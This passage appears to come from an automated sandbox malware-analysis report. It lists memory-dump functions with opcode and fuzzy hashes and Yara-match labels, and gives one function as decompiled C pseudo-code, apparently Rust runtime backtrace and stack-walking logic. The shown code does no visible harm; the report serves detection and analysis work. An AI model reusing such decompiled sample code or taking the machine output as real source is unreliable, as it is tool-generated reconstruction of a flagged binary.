                          • Opcode Fuzzy Hash: 27bc0dd3af28b2b8866cf3a5b7345e660d1b77f5f934cc889c342029ca7dab82
                          • Instruction Fuzzy Hash: 6041A6725083069FC749DE24898542BFBE2FFC4648F10492DF986A6260D7B1CA09CF93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01110A93, Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea123819013b98bd901f87fe69eee16f6e7ef06e723f090e5ff95d0efec0e3c1
                          • Instruction ID: 963a11b4dcb67d2a3b86948efc32c639b422e33921a7a26f98cc112b443953dc
                          • Opcode Fuzzy Hash: ea123819013b98bd901f87fe69eee16f6e7ef06e723f090e5ff95d0efec0e3c1
                          • Instruction Fuzzy Hash: FA313475C0021DEBCF48DFA5D88A4EEBFB5FB05318F208599D522A6214C3B48B45CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111282D, Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f3b398f48dae94253601706a75db96206645b053db3457b9ee22facfc9da846
                          • Instruction ID: e08793e08b757c103e3b62108abe9f108c90e2622f30323640cbbe7bf36042cc
                          • Opcode Fuzzy Hash: 6f3b398f48dae94253601706a75db96206645b053db3457b9ee22facfc9da846
                          • Instruction Fuzzy Hash: EA111376D0020CFBDF09DFA4C90A99EBBB2FB44304F10C099E914AB254D7B6AB659F40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE9920, Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb7291426497e970b37c0f4e5d872ef52b4eeeccb6c0ae96080c15a39736b02a
                          • Instruction ID: 142cf9b4bf2cd07ef6d31be1563ba0fa1c8c82b82c8fe74144bdaa23a6f8df7d
                          • Opcode Fuzzy Hash: cb7291426497e970b37c0f4e5d872ef52b4eeeccb6c0ae96080c15a39736b02a
                          • Instruction Fuzzy Hash: 100119723112018FD758CFA8D4A0A6A73E6BF49654F5544E9D41ACBB69EB30EC40CA51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF02CC, Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                          • Instruction ID: cae7beef62503557ee2474695be9e24f6721c62c37fb049237e4102d7e873aec
                          • Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                          • Instruction Fuzzy Hash: 8FE08C72A11238EBCB55CBCCC900A8AF3FCEB44E81B210596B511D3100E270DE01C7D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEEC0B, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                          • Instruction ID: 5e75a64813048549021dfdc47c0730d7d33dc8cc2f7272e3cbf840186296e3c9
                          • Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                          • Instruction Fuzzy Hash: DEC08C74001D008ACE45995092723A43368E786BC2F907C8CC8028BA85F62EB887D610
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011107D2, Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDDEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6ECDDEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6ECE3B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6ECEC310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6ed1d0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6ECF7370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6ECF6DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ed1ded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6ECE0EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6ed2adc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6ed2adc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6ed2adc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6ed1d5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed1cd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6ECD2320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6ed2adc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ed1d5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6ECEC310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6ECE9EEE();
						_t217 = E6ECDE690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6ed2ade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6ed2add0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6ECF6E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed1e2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6ed2ade8 = _t218;
									_t267 =  *0x6ed2adec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6ed2adec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6ed2adf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6ECEC310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6ECDE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6ed2add0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6ECEC310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6ed2ade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6ed2add0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6ECF6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed1e2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6ed2ade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6ECDE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6ed2adf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6ed2add0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6ECF6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed1e2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6ECDE880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6ed2adec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6ed2adc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6ed1d63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed1cd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6ECD2320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}



















































                          0x6ecddee3
                          0x6ecddee4
                          0x6ecddee5
                          0x6ecddee9
                          0x6ecddeef
                          0x6ecddef1
                          0x6ecddef7
                          0x6ecddefd
                          0x6ecddf07
                          0x6ecddf21
                          0x6ecddf27
                          0x6ecddf2e
                          0x6ecddf30
                          0x6ecddf33
                          0x6ecddf44
                          0x6ecddf49
                          0x6ecddf4c
                          0x6ecddf51
                          0x6ecddf56
                          0x6ecddf5d
                          0x6ecddf60
                          0x6ecddf67
                          0x6ecddf6a
                          0x6ecddf77
                          0x6ecddf7a
                          0x6ecddf96
                          0x6ecddf96
                          0x6ecddf9c
                          0x6ecddfa0
                          0x6ecddfa2
                          0x6ecddfa4
                          0x6ecddfae
                          0x6ecddfb2
                          0x6ecddfb7
                          0x6ecddfbd
                          0x6ecddfbd
                          0x6ecddfc0
                          0x6ecddfc3
                          0x6ecddfc6
                          0x6ecddfc9
                          0x6ecddfcc
                          0x6ecddfcf
                          0x6ecddf7c
                          0x6ecddfe0
                          0x6ecddfe0
                          0x6ecddfe6
                          0x6ecddfed
                          0x6ecddfed
                          0x6ecddff0
                          0x6ecddff2
                          0x6ecddffa
                          0x6ecde000
                          0x6ecde004
                          0x6ecde012
                          0x6ecddf80
                          0x6ecddf83
                          0x6ecddf85
                          0x6ecde03d
                          0x6ecde040
                          0x6ecde04a
                          0x6ecde04c
                          0x6ecde568
                          0x00000000
                          0x6ecde052
                          0x6ecde052
                          0x6ecde055
                          0x6ecde058
                          0x6ecde059
                          0x6ecde05e
                          0x6ecde064
                          0x6ecde069
                          0x6ecde06b
                          0x6ecde06e
                          0x6ecde073
                          0x6ecde076
                          0x6ecde078
                          0x00000000
                          0x00000000
                          0x6ecde07a
                          0x00000000
                          0x6ecde078
                          0x6ecddf8b
                          0x6ecddf8b
                          0x6ecddf91
                          0x6ecddf94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecddf94
                          0x6ecde027
                          0x6ecde02a
                          0x6ecde032
                          0x6ecde035
                          0x00000000
                          0x6ecde03b
                          0x00000000
                          0x6ecde03b
                          0x00000000
                          0x6ecde035
                          0x6ecde07c
                          0x6ecde07c
                          0x6ecde082
                          0x6ecde084
                          0x6ecde087
                          0x6ecde08e
                          0x6ecde091
                          0x6ecde093
                          0x6ecde095
                          0x6ecde095
                          0x6ecde099
                          0x6ecde09b
                          0x6ecde0a0
                          0x6ecde0ad
                          0x6ecde0ad
                          0x6ecde0a0
                          0x6ecde099
                          0x6ecde0b2
                          0x6ecde0b2
                          0x6ecde0b4
                          0x6ecde11e
                          0x6ecde121
                          0x6ecde124
                          0x6ecde127
                          0x6ecde12a
                          0x6ecde0b6
                          0x6ecde0b6
                          0x6ecde0ba
                          0x6ecde0bc
                          0x6ecde0c1
                          0x6ecde0c7
                          0x6ecde0d2
                          0x6ecde0d4
                          0x6ecde0d7
                          0x6ecde0da
                          0x6ecde0dd
                          0x6ecde0e1
                          0x6ecde0e3
                          0x6ecde0e5
                          0x6ecde0e9
                          0x6ecde0eb
                          0x6ecde0eb
                          0x6ecde0f7
                          0x6ecde0fc
                          0x6ecde0fc
                          0x6ecde108
                          0x6ecde108
                          0x6ecde10d
                          0x6ecde110
                          0x6ecde112
                          0x6ecde112
                          0x6ecde134
                          0x6ecde137
                          0x6ecde13d
                          0x6ecde140
                          0x6ecde143
                          0x6ecde14d
                          0x6ecde157
                          0x6ecde161
                          0x6ecde16b
                          0x6ecde178
                          0x6ecde181
                          0x6ecde182
                          0x6ecde187
                          0x6ecde18a
                          0x6ecde18c
                          0x6ecde405
                          0x6ecde405
                          0x6ecde408
                          0x6ecde40a
                          0x6ecde40c
                          0x6ecde410
                          0x6ecde41b
                          0x6ecde41b
                          0x6ecde410
                          0x6ecde420
                          0x00000000
                          0x6ecde192
                          0x6ecde192
                          0x6ecde198
                          0x6ecde19f
                          0x6ecde1a3
                          0x6ecde1a6
                          0x6ecde1ad
                          0x6ecde1af
                          0x6ecde1b8
                          0x6ecde1be
                          0x6ecde1c1
                          0x6ecde1c8
                          0x6ecde1cc
                          0x6ecde1d2
                          0x6ecde1d8
                          0x6ecde1de
                          0x6ecde1e6
                          0x6ecde1ef
                          0x6ecde1f9
                          0x6ecde200
                          0x6ecde205
                          0x6ecde208
                          0x6ecde209
                          0x6ecde20e
                          0x6ecde213
                          0x6ecde215
                          0x6ecde226
                          0x6ecde22c
                          0x6ecde22f
                          0x6ecde231
                          0x6ecde24a
                          0x6ecde250
                          0x6ecde252
                          0x6ecde595
                          0x6ecde5ae
                          0x00000000
                          0x6ecde258
                          0x6ecde258
                          0x6ecde25a
                          0x6ecde25f
                          0x6ecde265
                          0x6ecde267
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde267
                          0x6ecde233
                          0x6ecde233
                          0x6ecde239
                          0x6ecde23b
                          0x6ecde289
                          0x6ecde28e
                          0x6ecde291
                          0x6ecde296
                          0x6ecde299
                          0x6ecde29c
                          0x6ecde29e
                          0x6ecde2be
                          0x6ecde2be
                          0x6ecde2c7
                          0x6ecde2ce
                          0x6ecde2dd
                          0x6ecde2e2
                          0x6ecde2f7
                          0x6ecde2fe
                          0x6ecde301
                          0x6ecde30b
                          0x6ecde311
                          0x6ecde31b
                          0x6ecde325
                          0x6ecde32b
                          0x6ecde335
                          0x6ecde340
                          0x6ecde35e
                          0x6ecde361
                          0x6ecde364
                          0x00000000
                          0x00000000
                          0x6ecde376
                          0x6ecde37c
                          0x6ecde386
                          0x6ecde38b
                          0x6ecde38e
                          0x6ecde391
                          0x6ecde393
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde393
                          0x00000000
                          0x6ecde2a0
                          0x6ecde2ab
                          0x6ecde2b1
                          0x6ecde2b3
                          0x6ecde464
                          0x6ecde469
                          0x6ecde47e
                          0x6ecde485
                          0x6ecde48c
                          0x6ecde496
                          0x6ecde49d
                          0x6ecde4a0
                          0x6ecde4aa
                          0x6ecde4b0
                          0x6ecde4ba
                          0x6ecde4c4
                          0x6ecde4ca
                          0x6ecde4d4
                          0x6ecde4e0
                          0x6ecde4e0
                          0x6ecde4e6
                          0x6ecde4e8
                          0x6ecde506
                          0x6ecde522
                          0x6ecde524
                          0x6ecde527
                          0x6ecde395
                          0x6ecde398
                          0x6ecde39d
                          0x6ecde3a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde4ea
                          0x6ecde4f5
                          0x6ecde4fb
                          0x6ecde4fd
                          0x6ecde572
                          0x6ecde58b
                          0x00000000
                          0x6ecde4ff
                          0x6ecde4ff
                          0x6ecde501
                          0x00000000
                          0x6ecde501
                          0x6ecde4fd
                          0x00000000
                          0x6ecde52d
                          0x6ecde53d
                          0x6ecde543
                          0x6ecde54d
                          0x6ecde552
                          0x6ecde555
                          0x6ecde558
                          0x6ecde558
                          0x00000000
                          0x6ecde2b9
                          0x6ecde2b9
                          0x00000000
                          0x6ecde2b9
                          0x6ecde2b3
                          0x6ecde23d
                          0x6ecde269
                          0x6ecde274
                          0x6ecde27a
                          0x6ecde27c
                          0x6ecde5b8
                          0x6ecde5d1
                          0x6ecde5d9
                          0x6ecde5d9
                          0x6ecde5e0
                          0x6ecde5fc
                          0x6ecde282
                          0x6ecde282
                          0x6ecde284
                          0x00000000
                          0x6ecde284
                          0x6ecde27c
                          0x6ecde23b
                          0x6ecde217
                          0x6ecde217
                          0x6ecde21b
                          0x00000000
                          0x6ecde221
                          0x6ecde3a3
                          0x6ecde3a3
                          0x6ecde3a7
                          0x6ecde437
                          0x6ecde437
                          0x6ecde43a
                          0x6ecde43c
                          0x6ecde43e
                          0x6ecde442
                          0x6ecde44d
                          0x6ecde44d
                          0x6ecde442
                          0x6ecde452
                          0x6ecde3ad
                          0x6ecde3b0
                          0x6ecde3ba
                          0x6ecde3c4
                          0x6ecde3ce
                          0x6ecde3d8
                          0x6ecde3e2
                          0x6ecde3f8
                          0x6ecde3f9
                          0x6ecde401
                          0x6ecde403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde403
                          0x6ecde3a7
                          0x6ecde422
                          0x6ecde428
                          0x6ecde436
                          0x6ecde436
                          0x6ecde215
                          0x6ecde18c
                          0x00000000

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 6ECDDFF2
                          • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6ECDDFFA
                          • GetLastError.KERNEL32 ref: 6ECDE006
                          • GetLastError.KERNEL32 ref: 6ECDE018
                          • GetLastError.KERNEL32 ref: 6ECDE07C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDE0AD
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDE0F7
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDE108
